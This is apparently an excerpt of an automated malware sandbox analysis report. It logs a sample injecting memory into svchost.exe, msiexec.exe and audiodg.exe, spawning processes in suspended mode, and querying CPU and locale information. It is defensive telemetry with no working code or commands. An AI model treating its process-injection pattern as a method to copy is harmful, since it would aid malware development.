Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: B08CD08010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: C246C10010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 2042E32010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 17E0A37010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 9B7FAF3010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 724492D010 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
Source: explorer.exe, 00000004.00000000.1847439102.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.1845313284.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\explorer.exe Code function: 4_2_0A03F2EC cpuid 4_2_0A03F2EC
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free, 4_2_0A03EB98
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_0A046028
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_0A045EAC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_0A046D3C
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_0A0465B4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_0A03D5CC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_0C376D3C
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_0C3765B4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_0C36D5CC
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_0C375EAC
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_0C376028
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free, 4_2_0C36EB98
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_0E8C5EAC
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_0E8C65B4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_0E8BD5CC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_0E8C6D3C
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free, 4_2_0E8BEB98
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_0E8C6028
Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx, 4_2_0E9186D4
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free, 4_2_0E90F798
Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage, 4_2_0E918CF8
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_0E916C28
Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP, 4_2_0E9115BC
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_0E916AAC
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_0E918BF4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_0E91F318
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 4_2_0E918B40
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_0E9171B4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_0E90E1CC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_0E91793C
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free, 4_2_0E916950
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free, 4_2_0F4BF798
Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx, 4_2_0F4C86D4
Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP, 4_2_0F4C15BC
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_0F4C6C28
Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage, 4_2_0F4C8CF8
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 4_2_0F4C8B40
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_0F4CF318
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_0F4C8BF4
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_0F4C6AAC
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free, 4_2_0F4C6950
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_0F4C793C
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_0F4BE1CC
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_0F4C71B4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 4_2_10D7E1CC
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 4_2_10D871B4
